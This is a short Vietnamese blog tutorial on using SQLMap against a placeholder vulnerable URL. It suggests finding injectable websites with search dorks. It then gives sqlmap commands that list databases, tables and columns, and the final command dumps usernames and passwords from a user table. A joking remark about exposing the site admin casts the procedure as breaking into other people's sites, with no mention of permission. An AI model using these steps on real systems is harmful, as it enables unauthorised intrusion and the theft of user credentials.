Bảo Mật

Hướng dẫn sử dụng SQLMap

Bạn có thể dùng công cụ SQLMAP có sẵn trên Backtrack hoặc Kali, Windows. Đây là một trong những kỹ năng mà bất cứ ai hoạt động trong lĩnh vực security cũng phải biết.

Bạn có thể dùng một số dork để tìm 1 website bị lỗi SQL, 

Hướng dẫn sử dụng SQLMap 5

VD: ta có 1 site như này http://www.xxxxxxxx.com/about.php?id=1

Giờ khởi động SQL bằng cách đánh lệnh (-h hoặc –help) vào cửa sổ console

Mã:

# sqlmap --help

 

 

Để xem được database ta dùng lệnh sau :

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 --dbs

 

-u = đường dẫn url
–dbs = Liệt kê databases

 

Theo cái hình chình ình ở trên thì chúng ta thấy được ” unecuae_unec ” cái này là cái gì thì tôi ko cần nói nữa há 

Giờ chúng ta tiếp tục với lệnh :

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec --tables

 

-D = DBMS liệt kê dữ liệu
–tables = liệt kê cái gì thì các bạn tự tìm hiểu hén…..

 

Sau khi tìm thấy 1 số ” bảng tuần hoàn hóa học ” chúng ta tiếp tục dụng lệnh để show hàng ra

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user --columns

 

-T = DBMS lệnh lệt kê dữ liệu
–columns = liệt kê cái gì thì các bạn tự tìm hiểu hén…..

 

Đến đây là bạn đã có thể soi được quần chíp của bợn admin rầu đó )

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user -C user_username,user_password --dump

 

Đánh giá post

Rất Hữu ích

RatHuuIch là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. RatHuuIch cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bài liên quan

Theo dõi
Thông báo của
guest

0 Góp ý
Phản hồi nội tuyến
Xem tất cả bình luận
Check Also
Close
Back to top button